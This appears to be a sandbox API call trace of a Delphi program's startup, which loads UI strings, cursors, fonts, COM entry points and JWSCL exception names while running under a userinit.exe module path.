[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0f, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0e, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0d, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0c, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0b, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff0a, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff09, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff08, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff07, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff06, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff05, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff04, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff03, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff02, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff01, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff00, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1f, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1e, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1d, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1c, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1b, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff1a, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff19, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff18, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff17, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff16, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff15, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff14, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff13, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff12, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0120.104] LoadStringA (in: hInstance=0x2940000, uID=0xff11, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0120.105] LoadStringA (in: hInstance=0x2940000, uID=0xff10, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0120.105] LoadStringA (in: hInstance=0x2940000, uID=0xff2f, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0120.105] LoadStringA (in: hInstance=0x2940000, uID=0xff2e, lpBuffer=0x1aef28, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0120.105] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0120.105] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0120.105] GetVersion () returned 0x1db10106
[0120.105] GetCurrentProcessId () returned 0xfc8
[0120.105] GlobalAddAtomA (lpString="Delphi00000FC8") returned 0xc13c
[0120.105] GetCurrentThreadId () returned 0xfcc
[0120.105] GlobalAddAtomA (lpString="ControlOfs0294000000000FCC") returned 0xc135
[0120.105] RegisterClipboardFormatA (lpszFormat="ControlOfs0294000000000FCC") returned 0xc16e
[0120.105] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0120.105] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0120.105] GetSystemMetrics (nIndex=19) returned 1
[0120.105] GetSystemMetrics (nIndex=75) returned 1
[0120.105] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a61320, fWinIni=0x0 | out: pvParam=0x2a61320) returned 1
[0120.105] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0120.105] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0120.105] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ff9) returned 0x501a7
[0120.105] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0120.106] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0120.106] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffa) returned 0x5022d
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffb) returned 0x401ab
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffc) returned 0x40203
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffd) returned 0x401ff
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7fff) returned 0x40201
[0120.106] LoadCursorA (hInstance=0x2940000, lpCursorName=0x7ffe) returned 0x401e7
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0120.107] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0120.107] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0120.107] GetDC (hWnd=0x0) returned 0x1801089c
[0120.107] GetDeviceCaps (hdc=0x1801089c, index=90) returned 96
[0120.107] ReleaseDC (hWnd=0x0, hDC=0x1801089c) returned 1
[0120.107] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0120.107] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2999a60, dwData=0x2a6156c) returned 1
[0120.107] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x1af293, fWinIni=0x0 | out: pvParam=0x1af293) returned 1
[0120.107] CreateFontIndirectA (lplf=0x1af293) returned 0x1e0a0890
[0120.107] GetObjectA (in: h=0x1e0a0890, c=60, pv=0x1af084 | out: pv=0x1af084) returned 60
[0120.108] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x1af13f, fWinIni=0x0 | out: pvParam=0x1af13f) returned 1
[0120.108] CreateFontIndirectA (lplf=0x1af21b) returned 0x1a0a0847
[0120.108] GetObjectA (in: h=0x1a0a0847, c=60, pv=0x1af084 | out: pv=0x1af084) returned 60
[0120.108] CreateFontIndirectA (lplf=0x1af1df) returned 0x5a0a088f
[0120.108] GetObjectA (in: h=0x5a0a088f, c=60, pv=0x1af084 | out: pv=0x1af084) returned 60
[0120.108] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0120.108] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1af1f3, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0120.108] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x1af1f3 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0120.108] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x120000
[0120.109] GetKeyboardLayoutList (in: nBuff=64, lpList=0x1af174 | out: lpList=0x1af174) returned 1
[0120.110] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0120.110] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0120.111] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0120.111] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0120.112] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0120.112] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0120.112] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0120.112] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0120.112] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0120.112] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0120.112] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0120.112] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0120.112] LoadStringA (in: hInstance=0x2940000, uID=0xff59, lpBuffer=0x1aeed4, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0120.113] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0120.113] LoadStringA (in: hInstance=0x2940000, uID=0xff5a, lpBuffer=0x1aeed4, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0120.113] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0120.113] LoadStringA (in: hInstance=0x2940000, uID=0xff5b, lpBuffer=0x1aeed4, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0120.113] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0120.113] LoadStringA (in: hInstance=0x2940000, uID=0xff5c, lpBuffer=0x1aeed4, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0120.113] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0120.113] SetErrorMode (uMode=0x8000) returned 0x1
[0120.113] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ce90000
[0120.115] SetErrorMode (uMode=0x1) returned 0x8000
[0120.115] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePropertyFrame") returned 0x6ce920ea
[0120.115] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreateFontIndirect") returned 0x6ce920b7
[0120.115] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePictureIndirect") returned 0x6ce920c8
[0120.115] GetProcAddress (hModule=0x6ce90000, lpProcName="OleLoadPicture") returned 0x6ce920d9
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a2fa98*="EJwsclUnsupportedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a2fa80*="EJwsclPIDException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a2fa68*="EJwsclJwShellExecuteException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a2fa50*="EJwsclShellExecuteException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a2fa38*="EJwsclElevationException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a2fa20*="EJwsclAbortException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a2fa08*="EJwsclSuRunErrorException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a2f9f0*="EJwsclElevateProcessException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a2f9d8*="EJwsclCertApiException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a2f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a2f9a8*="EJwsclInvalidStartupInfo") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a2f990*="EJwsclFirewallNoExceptionsException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a2f978*="EJwsclFirewallInactiveException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a2f960*="EJwsclFirewallDelRuleException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a2f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a2f918*="EJwsclFirewallAddRuleException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a2f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a2f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a2f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a2f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a2f840*="EJwsclGetFWStateException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a2f828*="EJwsclSetFWStateException") returned 1
[0120.116] SysReAllocStringLen (in: pbstr=0x2a2f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a2f810*="EJwsclFirewallProfileInitException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a2f7f8*="EJwsclFirewallInitException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a2f7e0*="EJwsclGenericFirewallException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a2f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a2f7b0*="EJwsclInvalidRegistryPath") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a2f798*="EJwsclEndOfStream") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a2f780*="EJwsclClassTypeMismatch") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a2f768*="EJwsclInvalidHandle") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a2f750*="EJwsclInvalidIndex") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a2f738*="EJwsclInvalidSession") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a2f720*="EJwsclMissingEvent") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a2f708*="EJwsclInvalidPointerType") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a2f6f0*="EJwsclCreateProcessFailed") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a2f6d8*="EJwsclNilPointer") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a2f6c0*="EJwsclUnimplemented") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a2f6a8*="EJwsclInitWellKnownException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a2f690*="EJwsclKeyApiException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a2f678*="EJwsclKeyException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a2f660*="EJwsclHashApiException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a2f648*="EJwsclHashException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a2f630*="EJwsclCSPApiException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a2f618*="EJwsclCSPException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a2f600*="EJwsclTerminalSessionException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a2f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a2f5d0*="EJwsclTerminalServiceException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a2f5b8*="EJwsclTerminalServerConnectException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a2f5a0*="EJwsclTerminalServerException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a2f588*="EJwsclCryptUnsupportedException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a2f570*="EJwsclCryptApiException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a2f558*="EJwsclCryptException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a2f540*="EJwsclOSError") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a2f528*="EJwsclResourceInitFailed") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a2f510*="EJwsclResourceUnequalCount") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a2f4f8*="EJwsclResourceNotFound") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a2f4e0*="EJwsclResourceException") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a2f4c8*="EJwsclFailedAddACE") returned 1
[0120.117] SysReAllocStringLen (in: pbstr=0x2a2f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a2f4b0*="EJwsclUnsupportedACE") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a2f498*="EJwsclOpenWindowStationException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a2f480*="EJwsclWindowStationException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a2f468*="EJwsclCloseDesktopException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a2f450*="EJwsclCreateDesktopException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a2f438*="EJwsclOpenDesktopException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a2f420*="EJwsclDesktopException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a2f408*="EJwsclSACLAccessDenied") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a2f3f0*="EJwsclAccessDenied") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a2f3d8*="EJwsclLSAException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a2f3c0*="ESetOwnerException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a2f3a8*="ESetSecurityException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a2f390*="EJwsclInvalidParentDescriptor") returned 1
